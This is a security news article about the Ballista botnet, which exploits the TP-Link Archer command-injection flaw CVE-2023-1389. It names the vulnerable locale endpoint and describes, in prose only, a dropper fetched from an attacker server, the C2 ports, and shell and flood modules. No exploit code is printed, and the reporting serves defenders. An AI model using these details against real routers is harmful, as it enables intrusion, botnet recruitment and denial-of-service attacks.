• Home
  • Cyber Crime
  • Cyber warfare
  • APT
  • Data Breach
  • Deep Web
  • Digital ID
  • Hacking
  • Hacktivism
  • Intelligence
  • Internet of Things
  • Laws and regulations
  • Malware
  • Mobile
  • Reports
  • Security
  • Social Networks
  • Terrorism
  • ICS-SCADA
  • POLICIES
  • Contact me
MUST READ

Ahold Delhaize data breach affected over 2.2 Million individuals

 | 

Facebook wants access to your camera roll for AI photo edits

 | 

SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 51

 | 

Security Affairs newsletter Round 530 by Pierluigi Paganini – INTERNATIONAL EDITION

 | 

The FBI warns that Scattered Spider is now targeting the airline sector

 | 

LapDogs: China-nexus hackers Hijack 1,000+ SOHO devices for espionage

 | 

Taking over millions of developers exploiting an Open VSX Registry flaw

 | 

OneClik APT campaign targets energy sector with stealthy backdoors

 | 

APT42 impersonates cyber professionals to phish Israeli academics and journalists

 | 

Kai West, aka IntelBroker, indicted for cyberattacks causing $25M in damages

 | 

Cisco fixed critical ISE flaws allowing Root-level remote code execution

 | 

U.S. CISA adds AMI MegaRAC SPx, D-Link DIR-859 routers, and Fortinet FortiOS flaws to its Known Exploited Vulnerabilities catalog

 | 

CitrixBleed 2: The nightmare that echoes the 'CitrixBleed' flaw in Citrix NetScaler devices

 | 

Hackers deploy fake SonicWall VPN App to steal corporate credentials

 | 

Mainline Health Systems data breach impacted over 100,000 individuals

 | 

Disrupting the operations of cryptocurrency mining botnets

 | 

Prometei botnet activity has surged since March 2025

 | 

The U.S. House banned WhatsApp on government devices due to security concerns

 | 

Russia-linked APT28 use Signal chats to target Ukraine official with malware

 | 

China-linked APT Salt Typhoon targets Canadian Telecom companies

 | 
  • Home
  • Cyber Crime
  • Cyber warfare
  • APT
  • Data Breach
  • Deep Web
  • Digital ID
  • Hacking
  • Hacktivism
  • Intelligence
  • Internet of Things
  • Laws and regulations
  • Malware
  • Mobile
  • Reports
  • Security
  • Social Networks
  • Terrorism
  • ICS-SCADA
  • POLICIES
  • Contact me
  • Home
  • Breaking News
  • Cyber Crime
  • Hacking
  • Malware
  • Security
  • New Ballista Botnet spreads using TP-Link flaw. Is it an Italian job?

New Ballista Botnet spreads using TP-Link flaw. Is it an Italian job?

Pierluigi Paganini March 12, 2025

The Ballista botnet is exploiting an unpatched TP-Link vulnerability, targeting over 6,000 Archer routers, Cato CTRL researchers warn.

Cato CTRL researchers observed a new botnet, called Ballista botnet, which is exploiting a remote code execution (RCE) vulnerability, tracked as CVE-2023-1389 (CVSS score 8.8), in TP-Link Archer routers.

The CVE-2023-1389 flaw is an unauthenticated command injection vulnerability that resides in the locale API of the web management interface of the TP-Link Archer AX21 router. The root cause of the problem is the lack of input sanitization in the locale API that manages the router’s language settings. A remote attacker can trigger the issue to inject commands that should be executed on the device.

The vulnerability was first reported to ZDI during the Pwn2Own Toronto 2022 event. Working exploits for LAN and WAN interface accesses were respectively reported by Team Viettel and Qrious Security. 

Since early 2025, Cato CTRL has tracked the Ballista botnet targeting TP-Link Archer routers via CVE-2023-1389. The botnet spreads automatically using a remote code execution (RCE) flaw. TP-Link devices have faced scrutiny, with U.S. agencies considering a ban over security concerns linked to China. The researchers first detected the botnet on January 10, then it evolved by using Tor domains for stealth. The most recent attack attempt occurred on February 17.

“As part of its initial access vector, the Ballista botnet exploits CVE-2023-1389. This vulnerability in the TP-Link Archer router’s web management interface (T1190) stems from the lack of sanitization of user input in the country form of the /cgi-bin/luci;stok=/locale endpoint, resulting in unauthenticated command execution (T1059.004) with root privileges.” reads the Cato report. “The botnet exploits this vulnerability by injecting a payload that downloads and executes a cleartext shell dropper named dropbpb.sh, responsible for downloading the malware binaries and executing them on the compromised device.”

The payload installs a dropper using a bash one-liner that downloads the file from an attacker-controlled server (2.237.57[.]70) via HTTP on port 81. It grants full permissions and executes it as a background process. Once executed, the dropper deletes itself from disk and moves to other directories to download and run the malware. The process includes persistence, system exploration, and anti-detection techniques to maintain control over infected devices.

The malware kills previous instances, deletes itself to evade detection, reads system configuration files, and establishes an encrypted C2 channel on port 82. It spreads by exploiting CVE-2023-1389 and can execute remote shell commands or launch DoS/DDoS attacks when instructed by the C2 server.

The malware’s C2 commands include “shell” for executing bash commands and “flooder” for launching attacks. The shell module enables backdoor access for data exfiltration and persistence. The flooder module, triggered by specific parameters, continuously spawns new threads for attack execution. It processes encrypted data over a RAW socket, limiting further analysis. The malware’s modular design suggests support for multiple flood attack types, though only one has been identified.

Cato links the Ballista botnet to an Italian-based threat actor, the attribution is based on an Italian IP address and strings in Italian in the code. Named after the ancient Roman weapon, Ballista targets TP-Link Archer routers and has affected manufacturing, healthcare, services, and tech sectors in the U.S., Australia, China, and Mexico. A Censys search found over 6,500 vulnerable devices online. The botnet remains active, using advanced C2 protocols, discovery techniques, and DoS capabilities to control infected systems.

“IoT devices have been constantly targeted by threat actors for multiple reasons” concludes the report. “Proactive identification and management of IoT devices within an organization’s network remain essential for mitigating risk and ensuring the resilience of critical infrastructure.”.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, Ballista botnet)


facebook linkedin twitter

Ballista botnet Cybercrime Hacking hacking news information security news IT Information Security malware Pierluigi Paganini Security Affairs Security News

you might also like

Pierluigi Paganini June 30, 2025
Ahold Delhaize data breach affected over 2.2 Million individuals
Read more
Pierluigi Paganini June 29, 2025
Facebook wants access to your camera roll for AI photo edits
Read more

leave a comment

newsletter

Subscribe to my email list and stay
up-to-date!

    recent articles

    Ahold Delhaize data breach affected over 2.2 Million individuals

    Data Breach / June 30, 2025

    Facebook wants access to your camera roll for AI photo edits

    Social Networks / June 29, 2025

    SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 51

    Breaking News / June 29, 2025

    Security Affairs newsletter Round 530 by Pierluigi Paganini – INTERNATIONAL EDITION

    Breaking News / June 29, 2025

    The FBI warns that Scattered Spider is now targeting the airline sector

    Cyber Crime / June 28, 2025

    To contact me write an email to:

    Pierluigi Paganini :
    pierluigi.paganini@securityaffairs.co

    LEARN MORE

    QUICK LINKS

    • Home
    • Cyber Crime
    • Cyber warfare
    • APT
    • Data Breach
    • Deep Web
    • Digital ID
    • Hacking
    • Hacktivism
    • Intelligence
    • Internet of Things
    • Laws and regulations
    • Malware
    • Mobile
    • Reports
    • Security
    • Social Networks
    • Terrorism
    • ICS-SCADA
    • POLICIES
    • Contact me

    Copyright@securityaffairs 2024

    We use cookies on our website to give you the most relevant experience by remembering your preferences and repeat visits. By clicking “Accept All”, you consent to the use of ALL the cookies. However, you may visit "Cookie Settings" to provide a controlled consent.
    Cookie SettingsAccept All
    Manage consent

    Privacy Overview

    This website uses cookies to improve your experience while you navigate through the website. Out of these cookies, the cookies that are categorized as necessary are stored on your browser as they are essential for the working of basic functionalities...
    Necessary
    Always Enabled
    Necessary cookies are absolutely essential for the website to function properly. This category only includes cookies that ensures basic functionalities and security features of the website. These cookies do not store any personal information.
    Non-necessary
    Any cookies that may not be particularly necessary for the website to function and is used specifically to collect user personal data via analytics, ads, other embedded contents are termed as non-necessary cookies. It is mandatory to procure user consent prior to running these cookies on your website.
    SAVE & ACCEPT